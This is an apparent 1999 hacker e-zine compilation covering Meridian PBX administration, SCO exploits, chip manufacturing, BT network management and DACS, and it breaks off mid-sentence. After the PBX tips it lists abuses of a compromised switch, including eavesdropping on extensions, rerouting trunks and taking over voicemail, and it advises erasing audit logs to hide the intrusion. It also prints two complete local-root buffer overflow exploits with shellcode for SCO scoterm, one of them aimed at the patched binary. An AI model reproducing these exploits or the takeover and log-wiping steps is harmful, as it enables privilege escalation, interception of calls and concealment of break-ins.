enter DN prefix ranges as an FFC for "
Ring Again Activate"

Save "
Call Forward" Status upon Reload/Sysload
==============================================
LD17
CFWS YES

Call Waiting "
Buzz" on Digital Sets is Not Long Enough
======================================================
Turn on Flexible Incoming Tones Allowed
LD15
OPT SBA DBA
LD 11
CLS FITA

"
DSP" Display Key Applications
==============================
Youre on the phone, another call comes in...Press DSP, then ringing line to
see whos calling. Press DSP, then Speed Call, then entry number to view
entries. Rls23 Update - automatic Display CLS TDD

NHC - No Hold Conference
========================
With NHC, other party is not placed on hold while adding conferees. You can
also disconnect conferee called with NHC
LD11
KEY X NHC
Rls23 Update - Conf. Display/Disconnect
LD11
CLS CDCA

Call Forward Indication on 2500 Sets
====================================
Add Call Forward Reminder Tone. Special dial tone is heard only when call
forwarded.
LD15
OPT CFRA

Override Call Forwarded Phone
=============================
Add Flexible Feature Code for "
CFHO". Dial CFHO code, then dial extension.
LD57
CODE CFHO
On sets needing ability to perform override
CLS CFHA

Call Forward ONLY Internal Calls - Let Externals Ring
=====================================================
Great when you need to prioritize external callers.
LD11
KEY X ICF 4 ZZZZ

"
Delayed" Ring on Multiple Appearance DNs
=========================================
Non-ringing (SCN) keys will ring after a certain duration. Great for areas
where many of the same DNs appear.
LD11
DNDR X
(X = 0-120 seconds of delay before SCN keys will start to ring)

Audible Reminder of Held Calls
==============================
Receive "
buzz tone" every X seconds to remind user that call is on hold. Also
reminds user that Conference/Transfer was mishandled - call was never
transferred
LD15
DBRC X (X = 2-120 seconds between reminders)
LD11, CLS ARHA

Which Call "
On Hold" is Mine
============================
Exclusive Hold sets held calls to "
wink" at holding set, but stay "steady" at
other sets.
LD10/11
CLS XHA

Change Ring Cadence/Tone
========================
There are 4 ring styles, adjusted in the CLS of the digital set.
LD11
CLS: DRG1 -or- DGR2 -or- DRG3 -or- DRG4
Set pesky customer phones to DRG4 !

BFS - Nightmare in Shining Armor ?
==================================
BFS Keys allow the user to monitor the Call Forward and busy status of a set,
activate and deactivate Call Forward, and can be used as an Autodial key.
NOTE: Cannot perform MOV command with BFS. User can also forward sets by
accident.
LD11
Key XX BFS l s c u (target sets TN)

More Than 4 DNs Answered by One Mailbox?
========================================
Add up to 3 DNs to DN list in mailbox programming. Add 4th and all additional
DNs in "
Voice Service DN" (VSID) Table and set to "EM" to the mailbox.

1 Single LineTelephone, 3 DNs, 3 Users, 3 Mailboxes? How?
=========================================================
Create one 2500 set with one of the three DNs. Create 2 Phantom TNs, each one
with a new DN and DCFW each of them to the 2500 sets DN (from above) Add the
three mailboxes…now any of the three numbers will ring the one set, but
messages will be separated!

Change An NCOS After Hours
==========================
Here's an excerpt from the LD86 ESN data block that has NCOS 3 & 4 change to
NCOS 2 after 4:30PM and all day on weekends

<snip>

AC1 9
AC2
DLTN YES
ERWT YES
ERDT 0
TODS 0 06 00 16 29
7 00 00 05 59
7 16 30 23 59
RTCL YES
NCOS 0 - 0
NCOS 1 - 1
NCOS 2 - 2
NCOS 3 - 2
NCOS 4 - 2
NCOS 5 - 5

<snip>

Oops..the Console Went Into NITE...During the DAY!
==================================================
Use NITE entries that are based on "
Time of Day". See Night Service in
Features Book If the console goes into NITE during the day, send them to
either a set of DNs next to the console, or a voice menu/thru-dialer
explaining that there are "
technical difficulties". After hours, NITE calls
goes to where they should.

Just Two Security Tricks
========================
Create SPNs in BARS of: 000 thru 009 and create a Route List Block for them
with LTER=YES Now when Phreakers ask for extn 9000, they get nobody. Use the
FLEN entry on SPNs 0, 00, 011 so that nobody can transfer a caller to 9011,
90, etc.

Break Into Meridian Mailbox?
============================
Simply make the mailbox "
Auto-logon". For remote access, add their DN to your
set. Convenient if you need to access an employees mailbox without changing
their password. Useful for modifying greetings of an absent employees or
allowing a temporary employee access to a mailbox without divulging the
regular employees password.

Tracing Phone Calls
===================
TRAC 0 XXXX (X=extension)
TRAC l s c u
TRAC l s c u DEV (Adds BARS info)
TRAT 0 X (X=Console number)
TRAD (see book, traces T1 channels)
ENTC (see book, traces TN continuously - up to 3 TNs at a time ! )

Forgot your M3000 Directory Password?
=====================================
LD32
CPWD l s c u

Another Idea
============
Use a PC to log into your PBX, then activate the "
capture file". Now run a
TNB and keep it as a file rather than on paper. If your TNB file is large,
try a high power text editor, which can open even 20meg files in seconds.
Search the Internet "
Text Editor" Keep copies so you can go back and see how
a set was programmed when you out it by mistake.

*/

Using the above information you could sucessfully do the following:

a) Setup your own trunk configurations that allow outgoing calls.
b) Reset lines and trunks, reconfugure lines and trunks.
c) Set an internal extension(s) to share the same multiplexed trunk as you
so you can effectivly listen in on any incomming/outgoing phone call
made on that extension.
d) Set up calls that don't exist with no trunk assignment.
e) Set any users voicemail box with auto-logon paremters temporarily.
f) Close down the entire network
g) Set every phone in the company to ring forever...
h) Re-route incomming/outgoing trunk calls to any destination.
i) Park your own incomming line as "
on console" so you can answer calls made
to a pre-set extension.
j) Make yourself the company oprtator.
k) Trace phonecalls, audit logs etc.
l) Set all trunks to loopback on one another.
m) Anything you want?

Thats just a few ideas. But before you do ANYTHING, you should be aware that
anything you do could have devestating impact on the companys phone switch.
For example, say you accidently commanded the system to shut down.. You would
effectivly be killing 6000+ peoples phone lines, which would yield colosal
financial burden/loss onto the company. Generaly I'm just saying, be nice..
Just because you have the power to do such things, it doesnt mean you have to
do it. :)

A final note: In the aftermath of obtaining access to a merdian switch, it is
generaly advisable to erase all trace of you ever being on there. This can
be achived by reseting trunk audit logs, and erasing any log of your incoming
trunk setups. Therefore, if the real admin decided to track what was going on
he/she would get nowhere because the lines you used to initially call into
the system DO NOT EXIST. Its just a case of using your imagination. Don't be
destructive, Don't alter anything that would be noticed, Generally don't be
a f00l.. Thats the end of this file, I hope you enjoed it. Take it easy.

Shouts to D4RKCYDE, NOU!, b4b0, 9x, subz, pbxphreak, lusta, gr1p, LINEMANPUNX.


. .. ... .......... BL4CKM1LK teleph0nics .......... ... .. .
. .. ... .......... http://hybrid.dtmf.org ......... ... .. .

.
:
|
+-+[ SCO buffer overflow lameness ]+---> by darkraver <----------------------+
+-+[ D4RKCYDE ]+---> <----------------------+
|
:
.
SCO patches lameness
--------------------
The Dark Raver


I installed a good SCO OpenServer 5.0.4 on my box some months ago and spent
some time playing with it and coding some exploits. Some of my friends have
been testing these exploits on other machines and surprisingly some of them
had told me that some of the bugs exploited were still present in the
patched binaries of SCO.

I knew that Sun and SGI had shipped some patches that didn't work correctly
but I couldn't imagine SCO doing the same thing.

For example, the old well known scoterm bug:

-------------------------------------------------
$ /usr/bin/X11/scoterm.old -display `a 10000`
Error: Can't open display: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

$ /usr/bin/X11/scoterm.old -geometry `a 10000`
Segmentation Fault (core dumped)

$ /usr/bin/X11/scoterm.old -fg `a 10000`
Segmentation Fault (core dumped)

$ /usr/bin/X11/scoterm.old -bg `a 10000`
Segmentation Fault (core dumped)
-------------------------------------------------

A lot of overflows...

And one of my first exploits, exploiting the -geometry overflow:

-------------------------------------------------
/*
* <scotermx.c> Local root exploit
*
* Offset: scoterm (SCO OpenServer 5.0.4)
* 0 -> From an open scoterm (without display parameter)
* 2500 -> From remote telnet (with display parameter)
*
* Usage:
* $ cc scotermx.c -o scotermx
* $ scoterm
* $ /usr/bin/X11/scoterm -geometry `scotermx 0`
* or
* $ /usr/bin/X11/scoterm -display 1.1.1.1:0 -geometry `scotermx 2500`
*
* Note: scoterm need to be run from a valid x-display
*
* By: The Dark Raver of CPNE (Murcia/Spain - 21/6/99)
*
* <http://members.tripod.com/~ochodedos> - <doble@iname.com>
*
*/


#include <stdlib.h>
#include <stdio.h>


char hell[]=
"
\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"
\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"
\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";

/*
char hell[]=
"
\xeb\x1b" // start: jmp uno
"
\x5e" // dos: popl %esi
"
\x31\xdb" // xorl %ebx,%ebx
"
\x89\x5e\x07" // movb %bl,0x7(%esi)
"
\x89\x5e\x0c" // movl %ebx,0x0c(%esi)
"
\x88\x5e\x11" // movb %bl,0x11(%esi)
"
\x31\xc0" // xorl %eax,%eax
"
\xb0\x3b" // movb $0x3b,%al
"
\x8d\x7e\x07" // leal 0x07(%esi),%edi
"
\x89\xf9" // movl %edi,%ecx
"
\x53" // pushl %ebx
"
\x51" // pushl %ecx
"
\x56" // pushl %esi
"
\x56" // pushl %esi
"
\xeb\x10" // jmp execve
"
\xe8\xe0\xff\xff\xff" // uno: call dos
"
/bin/sh"
"
\xaa\xaa\xaa\xaa"
"
\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0
*/


#define OFF 0x80452ff // SCO OpenServer 5.0.4
#define ALINEA 1
#define LEN 2000


int main(int argc, char *argv[]) {

int offset=0;
char buf[LEN];
int i;

if(argc < 2) {
printf("
Usage: scotermx <offset>\n");
exit(0); }
else {
offset=atoi(argv[1]); }

memset(buf,0x90,LEN);
memcpy(buf+1000,hell,strlen(hell));
for(i=1100+ALINEA;i<LEN-4;i+=4)
*(int *)&buf[i]=OFF+offset;

for(i=0;i<LEN;i++)
putchar(buf[i]);

exit(0);
}
-------------------------------------------------

Now let see the patched binary from SCO:

-------------------------------------------------
System Security Enhancement (SSE) 009b - 27th January 1998

Problem:

A vulnerability in /usr/bin/X11/scoterm has been identified.
There is a risk that exploit details for this vulnerability
may be distributed.

The enclosed patch should be applied as soon as possible.

Patch:

A replacement /usr/bin/X11/scoterm binary is supplied for each
of the following SCO operating systems:

- SCO Open Desktop/Open Server Release 3.0

----
NOTE: For SCO OpenServer Release 5, please obtain and install OSS473A.
----

Note that the following SCO operating systems are not vulnerable:

- SCO CMW+ 3.0
- SCO UnixWare 2.1

Installation:

Perform the following steps logged in as root, in system
maintenance mode (single user):

1. Create a temporary directory, and copy SSE009 into it:

# mkdir /tmp/sse009b
# cp sse009b.tar.Z /tmp/sse009b

2. uncompress the tar file:

# cd /tmp/sse009b
# uncompress sse009b.tar.Z

3. extract the files from the tar file:

# tar xvf sse009b.tar

4. Replace your old /usr/bin/X11/scoterm with the appropriate
new binary, and set the file permissions and privileges:

# cp scoterm.odt3 /usr/bin/X11/scoterm
# chown root /usr/bin/X11/scoterm
# chgrp bin /usr/bin/X11/scoterm
# chmod 4711 /usr/bin/X11/scoterm

Disclaimer:

SCO believes that this patch addresses the reported vulnerability.
However, in order that it be released as soon as possible, this patch
has not been fully tested or packaged to SCO's normal exacting
standards. For that reason, this patch is not officially supported.
SCO intends to make an official supported and packaged fix available
in the near future.
-------------------------------------------------

Lets look for overflows:

-------------------------------------------------
$ /usr/bin/X11/scoterm -geometry `a 10000`
scoterm: unable to open language file '/usr/lib/X11/%L/sco/ScoTerm/LangIndex'.
scoterm: keyboard mapping files are unavailable.
scoterm: scancode mode being disabled.
Warning: Shell widget "
popup_mainMenu" has an invalid geometry specification:
"
aaaaaaaaaaaaaaa...aaaaa"
Segmentation Fault (core dumped)
-------------------------------------------------

Ooops! the overflows are still there.

Taking a look with the gdb in the -geometry overflow, we see that the only
things that have changed are the size of the buffer (smaller) and the
stack address.

Modifying the old exploit to work here was so simple:

-------------------------------------------------
/*
* <st2.c> Local root exploit
*
* Offset: /usr/bin/X11/scoterm => Work only against patched binaries,
* for default binaries use the old exploit.
* -2000 -> Started from scoterm or xterm on localhost
* 0 -> Started from remote telnet (with valid display parameter)
*
* Usage:
* $ cc st2.c -o st2
* $ /usr/bin/X11/scoterm -display 1.1.1.1:0 -geometry `st2 0`
*
* By: The Dark Raver of CPNE (Spain - 5/8/99)
*
* <http://members.tripod.com/~ochodedos> - <doble@iname.com>
*
*/


#include <stdlib.h>
#include <stdio.h>


char hell[]=
"
\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"
\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"
\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";

/*
char hell[]=
"
\xeb\x1b" // start: jmp uno
"
\x5e" // dos: popl %esi
"
\x31\xdb" // xorl %ebx,%ebx
"
\x89\x5e\x07" // movb %bl,0x7(%esi)
"
\x89\x5e\x0c" // movl %ebx,0x0c(%esi)
"
\x88\x5e\x11" // movb %bl,0x11(%esi)
"
\x31\xc0" // xorl %eax,%eax
"
\xb0\x3b" // movb $0x3b,%al
"
\x8d\x7e\x07" // leal 0x07(%esi),%edi
"
\x89\xf9" // movl %edi,%ecx
"
\x53" // pushl %ebx
"
\x51" // pushl %ecx
"
\x56" // pushl %esi
"
\x56" // pushl %esi
"
\xeb\x10" // jmp execve
"
\xe8\xe0\xff\xff\xff" // uno: call dos
"
/bin/sh"
"
\xaa\xaa\xaa\xaa"
"
\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0
*/


#define OFF 0x7fffeb80 // SCO OpenServer 5.0.4
#define ALINEA 2
#define LEN 1500


int main(int argc, char *argv[]) {

int offset=0;
char buf[LEN];
int i;

if(argc < 2) {
printf("
Usage: st2 <offset>\n");
exit(0); }
else {
offset=atoi(argv[1]); }

memset(buf,0x90,LEN);
memcpy(buf+600,hell,strlen(hell));
for(i=700+ALINEA;i<LEN-4;i+=4)
*(int *)&buf[i]=OFF+offset;

for(i=0;i<LEN;i++)
putchar(buf[i]);

exit(0);
}
-------------------------------------------------

This isn't the only patch that doesn't fix all vulnerabilities. Patch 024b
fixed bugs on the Xsco x-window server, but didn't fix the most dangerous
one: a buffer overflow that let you became root

Lets wait for the SCO guys to rewrite these patches soon...

The Dark Raver

.
:
|
+-+[ making chipz part I ]+---> by hitman <----------------------------------+
+-+[ D4RKCYDE ]+---> <----------------------------------+
|
:
.
[Making A Computer Chip Part A]
>>>>>>>>>>>>h1tman<<<<<<<<<<<<<

/* I did not write this article,my comp science teacher gave it to */
/* me and i am merely typing it up for informational purposes only */

A computer chip is made by building layers of electronic pathways and
connections using conducting and non-conducting materials on a surface of
silicon. The combination of these materials into specific patterns forms
microscopic electronic components such as transistors, diodes, resistors, and
capacitors; the basic building blocks of electronic circuits. Connected
together on a chip,these components are referred to as an integrated circuit.
The application of the conducting and non-conducting materials to the silicon
base is done through a series of technically sophisticated chemical and
photographic processes. Some of the manufacturing steps are shown in the
following paragraphs.

A computer chip begins with a design developed by engineers usings a
computer aided circuit design program. In order to better view the design,
greatly enlarged printouts are prepared. Some chips only take a month or two
to design while others may take a year or more. A seperate design is required
for each layer of the chip. Most chips have at least four to six layers but
some have up to fifteen.

Although other materials can be used, the most common raw materials
used to make chips is silicon crystals that have been refined from quartz
rocks. The silicon crystals are melted and formed int a cylinder five to ten
inches in diameer and several feet long. After being smoothed, the silicon
ingot is sliced into wafers four to eight inches in diameter and 4/1000 of an
inch thick.

Much of the chip manufacturing is performed in special laboratories
called clean rooms. Because even the smallest particle of dust can ruin a
chip,the cleans rooms are kept 1000 times cleaner that a hospital operating
room. People who work in these facilites must wear special protective
clothing called bunny suits. Before entering the manufacturing area, the
workers removed any dust on their suits in an air shower.

After the wafer has been polished and sterilized, it is cleaned in a
chemical bath. Because the chemicals used in the cleaning process are
dangerous, this step is usually performed by a robot. After cleaning, the
wafers are placed in a diffusion oven where the first layer of material is
added to the wafer surface. Other materials, called dopants, are added to the
surface of the wafer in a proces called ion implantation. The dopants create
areas that will conduct electricity. Channels in these layers of materials
are removed in a process called etching. Before etching, a soft gelatin-like
emulsion called photoresist is added to the wafer. During photolithography,
an image of the chip design, called a mask, is used as a negative. The
photoresist is exposed to the mask using ultraviolet light. Ultraviolet light
is used because its short wavelength can reproduce very small details on the
wafer. Up to 100 images of the chip design are exposed on a single wafer. The
photresist exposed to the ultraviolet light becomes hard and the photoresist
covered by the chip design on the mask remains soft. The soft photoresist and
some of the surface materials are etched away with hot gases leavinig what
will become circuit pathways. The process of adding material and photoresist
to the wafer,exposing it to ultraviolet light, and etching away the unexposed
surface, is repeated using a different mask for each layer of the circuit.

After all circuit layers have been added, individual chips on the wafer are
tested by a machine that uses probes to apply electrical current to the chip
circuits. In a process called dicing, the wafers are cut with a diamond saw
into individual chips called die. Die that have passed all tests are placed
in a ceramic or platic case called a package. Circuits on the chip are conned
to pins on the package using gold wires. Gold is used because it conducts
electrcity well and does not corrode. The pins connect the chip to a socket
on a circuit board.

Continued in Part B...

.
:
|
+-+[ System X network administration ]+---> by hybrid <----------------+
+-+[ D4RKCYDE ]+---> hybrid@dtmf.org <----------------+
|
:
.

_\|/_ [ GBH ] Gwahn Burnin Haxorz [ GBH ] _\|/_


BT Network Administation Support System Development
SYSTEM X and OMC network operations..
BT PhoneBone tekniq By hybrid <hybrid@dtmf.org>
NOT TO BE SHOWN OUTSIDE BT. GBH internal awarez. [ _\|/_ ]
| GBH |
: :
. .

PART I (Introduction to BT managment on the PSTN)

Introduction

The technology within the network has advanced through digitalisation of
both transmission and switching, and the introduction of computer contolled
network elements. The greater reliability of this technology and the ability
to manage and configure the elements remotely has created new opportunities
for efficiant managment of the network.

These opotunitys have been translated into a vision for the future operation
and managment of the network, initially through the Network Administration
Task Force (NATF) and subseqent refinements in terms of architecture (Network
Managment Architecture), and process (Strategic Systems Plan (SSP)).

THE VISI0N

The vision can be summerised as:

-+ end-to-end network managment
-+ functioncal coverage of the whole network life cycle
-+ fully integrated functionality
-+ high levels of automation/decision support
-+ conformant to architectual objectives:
a) network managment hierarchy
b) co-operative network architecture
c) open systems platform

End-to-End managment

It is essential to be able to manage networks made up of elements from
different vendors and different generations of equipment in a consistant
manner, so that the network can be viewed as a complete entity which provides
a managed service platform.

Whole Life Cycle

Networks and services must be managhed from 'cradle to grave' (figure 1),
covering:

-+ forecasting
-+ requirments analysis
-+ detailed dimensioning and project planning
-+ data building
-+ installation and commisioning
-+ maintenance/billing/traffic managment
-+ repair
-+ performance
-+ enhancment/withdrawal


future service | pre-service
|
|
requirments | data building
O
forceasting / \ installing
/ \
performance / \ commissioning
/\ \/
/ \
FIGURE 1 / \ NETWORK AND
/ \ SERVICE LIFE
O---------------<---------------O CYCLE
/ \
/ \
/ statistics billing maintenance \

traffic managment repair


Hands free operation

It is essensial to give network managers a high level of automation in order
to eneable them to cope with the levels of complexity involved, vast

  
amounts
of data, apparently random nature of problems, and the need for speed,
accuracy and consistancy in decision making. This requires:

-+ incidents to be analyised automatically with the manager's concurance
being sought to the solution offered;

-+ automatic restoration of service to be achived whenever possible;

-+ jobs depached to the workforce based on an optimum approach to jeopardy,
costs, tactics and company image.

-+ customers notification of service affected generated automaticaly to the
approproate customer-facing unit; and

-+ performanace statistics kept and analysed on all key proccesses.


Development challenges

The challenge for the system developers is to be responsive and meet new
requirments quickly, while producing enduring systems which fit within an
integrated set-the jigsaw-- the whole evolving towards the Network
Administration Implementation Program (NAIP) and SSP vision in a cost
effective manner.

The developers have to move from a possision of well over 200 systems, most
of which do not interwork, and many of which no longer offer all the
essensial fucnctions, to a set of around 40 fully integrated high
functionality key systems.

Functions must be brought into line with the required buisness proccesses and
must evolve to match the demands of new network technologys, for instance,
planning rules for fibre systems must be continually reviwed to encompass
increasing capacities and repeaterless operation.

Systems must also take account of the changing operational organaisations
and procedures, framework which can evolve without damaging the software
investment already made. Solutions have to be achived within four planes of
change as illustrated in figure 2.


-+ linked planes of change

+--------+ +------------------------------------------+
| | | | -+ people
| | | | -+ groups/duties
| N O-><-O-- | -+ skillz
| | | USER ORGANISATION | -+ procedures
| E | +-------------------o----------------------+
| | |
| T | +-------------------|----------------------+
| | | | | -+ maintainence
| W | | : | -+ planning
| O-><-O-- | -+ repair control
| 0 | | NETWORK MANAGMENT FUNCTIONS | -+ traffic/control
| | +-------------------o----------------------+ -+ data building
| R | |
| | +-------------------|----------------------+
| K | | | | -+ computers
| | | : | -+ terminals
| O-><-O-- | -+ database
| | | COMPUTING AND HOST ARCHITECTURE | -+ etc.
+--------+ +------------------------------------------+


PART II (Adminstration of BT Network layers) ohday.

-+ Interface Architecture

The interface architecture provides the means to link all the pieces of the
jigsaw together. By a mix of Open Systems Interconnection (OSI) products and
pragmatic proprietry products, (for example, SNA, DECNET), a communications
infastructure will be deployed to connect users to systems, systems to other
systems for information sharing, and systems to the network elements they are
managing. Key standards for these interfaces are being defined in the Co-
Operative Networking Architecture (CNA-M) prgramme.

-+ Data Architecture

Data architecture offers the ability to standardise what the processes need
to talk about. Defining the structure and format of the key information
items provides a common currency which may be shared by the complete family
of support systems. The object orientated style of the CNA-Managment
communications protocols will ofrce the standardisation of objects as well
as simple data structures in the CNA-M programme and external standards
bodies like ISO, CCITT and the OSI Network Managment Forum.

-+ System (Computing) Architecture

The system architecture defines how a particular system is constructed,
rather than the fucntional role it plays within the jigsaw. This deals with
the following main conponments.

-+ computer hardware
-+ operating system
-+ database managment system
-+ transaction proccessing
-+ communications drivers
-+ man -- machine interfacing (MMI), and
-+ application programming interface (API).

There is a drive by the computing industry to create standard open interfaces
to these elements, based on UNIX/POSIX and X Open standards to produce the
open platform. The system developers are also driving towards reusable sub-
functions and utilities. These two initiiatives are being bought together
in the Generic Systems Architecture (GSA).

-+ Integration and evolution

SSP, ONA-M, Generic Systems Architecture and the Network Control Architecture
Board (NCAB) 5 year vision for support systems evolution have all
contibuted to creating a clear picture of how support systems will look in
the future. It is important, however, that a very pragmatic approach is taken
to realising this vision.

-+ SWITCH MANAGMENT

BT switch managment is carried out by the OMC (Operations Maintanace
Center) for local exchanges and the operations and maintanance unit support
system (OMUSS) (an OMC derivative) for trunk exchanges. This system has
clocked up over 3000 system months of reliable service sinse its introduction
n 1984. As the first majour network managment system, it has paved the way
for the NACC/NOU structure.



+-------------+ +---------+ +-----------+
| |<-----------------. | NMW2 | | |
| CSS |<---------. | +---------+ | DCSS |
+-------------+ | : | |
| +--:-------------+ +-----------+
| | |
| | NOMS 2 |-------------------.
: | | |
: +-/--------/--|--+ +-----:-----+
.- - - - - : - -/- -. / | | |
| : / | / | | NOMS 1 |
:/ :/ :/ : | |
+------+ +---/--+ +--/---+ +---:--+ +-----------+
| | | | | | | | | | | |
| FAS | | OMC | | TMS | | OMUSS| : : : :
+------+ +------+ +------+ +------+ ALARMS
:\ :\ :\ :\
| | | |
| : | :
| .----------. | .----------. .----------.
.--------. | | | | | | | |
| | : | | : | | | INTER- |
| HOUSE O=========O LOCAL O=========O TRUNK O=========O NATIONAL O===
|________| | | | | | |
|____:_____| |____:_____| |__________|
: \ / : ______
: \ / : | |
: x : |______|
: / \ :
.----:-----./ \.----:-----.
| | | |
| | | |
| DDC |-------->| DESS |
| | | |
|__________| |__________|


-+ CSS : Customer Service System
-+ NMW2 : Network Managment Workstation
-+ DCSS : District Control Support System
-+ NOMS : Network Operations Managment System
-+ FAS : Fibre Access System
-+ OMC : Operations and Maintanance Center
-+ TMS : Transmission Monitoring System
-+ DDC : District Data Collector
-+ DESS : Digital Exchange Support System
-+ OMUSS : Operations and Maintenance Unit Support System


There are over 60 systems in field serivce, with over 10,000 registered
users, covering all trunk and local System X and AXE switches. Enhancment
continues to run at a considerable pace, working its way into the field
through two major realeses per year.


+------------+ +--------+ +------------+
| EXCHANGE A |<----------| |<------------| EXCHANGE Z |
| |---------->| |------------>| |
+------|-----+ +----|---+ ^ +------|-----+
| | | |
==============|======================|=========|==============|=============
: : : :
+------:-----+ +---------:---------:---+
| ALARMS HAN | | | +---
| DELING SYS |<-----| O M S |----->| O-O
+------:-----+ | | +---
: | |
| | | +---
| | SRS LECS |----->| |_\
| | | +---
+----:----+ | |
|TERMINAL | | USER FACLITYS/DUTIES | +---
|DISPLAY | | DEC VAX H/W |----->| ( )
+---------+ +-----:---:---:---:-----+ +---
| | | |
| | | |
A) ADMINISTRATION USERS / / \ \
B) MAINTANENCE USERS | | | |
C) REMOTE USERS ^ ^ ^ ^
D) OTHER SYSTEMS A B C D


-+ OMS : Operational Maintanence System
-+ SRS : Subscribers Record System
-+ LECS : Local Equipment Computer System


The system is based on a VAX/VMS platform with Oracle relational database,
its pwn basic forms/menus man --machine interface and X.25/V.24
communications drivers. The Exchange interfaces are conrolled through
flexable data-driven translators and the basic structure of the system is
highly modular. The priority evolution steps for OMC are:

-+ interoperability with CSS, the transmission network survailance (TNS)
system and workforce managment (NOMS2)
-+ additional exchange interfaces for advanced services unit (ASU) etc.,
-+ adoption of advanced workstation (NMW2) man --machine interfacing
-+ donation of functions to Generic Event Managment (GEMS).


-+ Transmission Managment

The transmission monitoring system (TMS) provides a comprehensive survailence
system for the transmission aspects of the network. While the OMC manages a
smaller set of complex network elements, the TMS faces the challenge of
collecting, collating and displaying information from a vast array of
physically dispersed conponments. After field-trial stages and recent
product trials in London, the TMS is now being rolled out into the three
pilot NOU catchment areas. The major TNS functions are:

-+ alarm reception, display, filing, retrival and archiving
-+ alarm association and comparason;
-+ performance data proccessing and display
-+ access to other systems (for example, the junction network system (JNS)
database)).


-+ Local Access Managment

The flexible access system (FAS) is a system which has been developed to
manage fibre in the local loop. Systems have been installed for the City
Fibre Network and Docklands. The support system, the service access control
center (SACC), once more shares a common lineage and technology platform with
OMC combined with the ICENI database produced by NMD, and used as an
element in the service desk and facilies managment systems. FAS was the first
system to attempt to adopt the network managment hierarchy, with well
defined interfaces between the service access control center (SACC) (network
level controller) and element managers developed by equipment supplyers. It
also adopted the network managment workstation (NMW1) to remove a multitude
of various terminals.

Until the future of the FAS is fully determined, the SACC will not be
enhanced and evolved. However, the structure of future advanced local access
managment is being considered based on experience of FAS, LLOFT (the local
loop optical fibre trial) and cable TV managment.


-+ Data managment and performance analysis

The digital exchange support system (DESS) consists of many applications
which are grouped together under a single code name. Some of the functions
these appications perform are:

-+ data build for new exchanges and major upgrades
-+ generic network performance statistics by analysiing the large volume of
data generated bt switches
-+ providing national reference source for charging information, and
associated validation tools to ensure charging integrety
-+ provding a database and tracking mechanism for all exchange insident
reports; and
-+ a register of the hardware and software build levels for all exchanges in
the network.

DESS is a major system which runs on the largest VAX cluster configurations
in the world. It supports a population of 2000 users, 140 of which may be
similtaniously logged into the system. A typical daily workload for DESS
would be analysing 1-4 Gigs of exchange generated data, producing 35
thousand pages of printout, and writing or reading 1500 exchange cartridges.

COMMING SOON... NOMS INTERNAL NETWORKING OPER4TIONS.

.
.
:
|
+----+ GBH -+o
|
+----> psyclone -+o +[ 4 HORSEMAN OF THE PSTN NINJ4 APPOCALIPZ ]+--
+----> hybrid -+o +[ GWAHN BURN'IN H4X0RZ ]+--
+----> gr1p -+o
+----> kp -+o-----+[ _\|/_ ]
| |
: :
. .

-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-[ _\|/_ ]+-[ G ]-+
-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-[ _\|/_ ]+-[ B ]-+
-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-+[ _\|/_ ]+-[ _\|/_ ]+-[ H ]-+

.
:
|
+-+[ digital access carrier system DACS ]+---> by hybrid <-------------------+
+-+[ D4RKCYDE ]+---> hybrid@dtmf.org <-------------+
|
:
.
BL4CKM1LK teleph0nics [ http://hybrid.dtmf.org ]
Digital Access Carrier System DACS
by hybrid <hybrid@dtmf.org>



How did I get this info? -- Well the truth is, as a young child I was
abducted by extra terrestrial biological entitys who hardwired microchips in
my brain that allow me to intercept the thoughts of telecommunications
engineers via ESP.. I was told to gather intricate information about the
planet Earth's international PSTN, so when my people from the distant world
of xinbin come to inhabit the planet, they can use the information I have
transmitted to them from the microchips in my brain as a means to take over
our communication networks... er, shit, thats not rite (better lay off the
caffiene for a bit).. What I ment to say was, a friend of mine werks for BT,
and gave me some nice info on DACS :) -werd


Introduction.


Digital Access Carrier System is used by British Telecom to transform one
residential line into two seperate lines without actually installing an
additional trunk pair. The idea of DACS is very similar to the design and
implementation of the WB9OO unit used in the past (http://hybrid.dtmf.org/
files/hybrid-files/wb900.txt). The DACS system is becomming increasingly
popluar in the UK beacuse more and more people are requesting additional
lines, usually for net access.


Digital Access Carrier System


_____________ _____________
B1 | | | | B1
-------------O | single pair of | O-------------
| | wires (trunk) | |
analogue | E.U O==================O E.U | analogue
| | digital | |
-------------O | | O-------------
B2 |_____________| |_____________| B2




The chances are, if you order another line from BT, they will simply
multiplex your existing line into 2 seperate carriers. Think about it.. if
you have one line operating on a dedicated carrier, then the line is
multiplexed into 2 serperate carriers, the bandwith will be cut in half. To
this date, BT are encouraging its customers to join the 'BT SuperHighway' by
installing a second line.. What BT dont tell you is that you will only be
able to get a maximum of 28.8bps from your 'second' line.

In this file, I'll look into the DACS carrier system in detail, aswell as
ways to determine what kind of trunk installation you have if you have
ordered a second line from BT. Werd, enjoy the file..


DACS II


The origional DACS system had limited capabilitys, and did not allow the
customer to have CLASS services on their line. The newer DACS implementation
is called DACS II and allows a slightly more advanced service to customers.
Now people with DACSII units on their line, have access to CLASS (Customer
Loop Access Signalling System). The new DACS hardware, allows customers lines
to have K Break (Disconnect Clear), aswell as common services such as CLI,
which where previously unavailable to DACS I customers.


At the eXchange


All exchanges have a database of different customers who have been fitted
with the DACS equipment. Some of the commands used on the CSS database at
the local terminating exchange are as follows:

<DFTR> DISPLAY FRAME TERMINATION RANGE (to see if DACS equipment is
fitted to the exchange)

<DFJ> DISPLAY FRAME JUMPER (to determine whether a particular
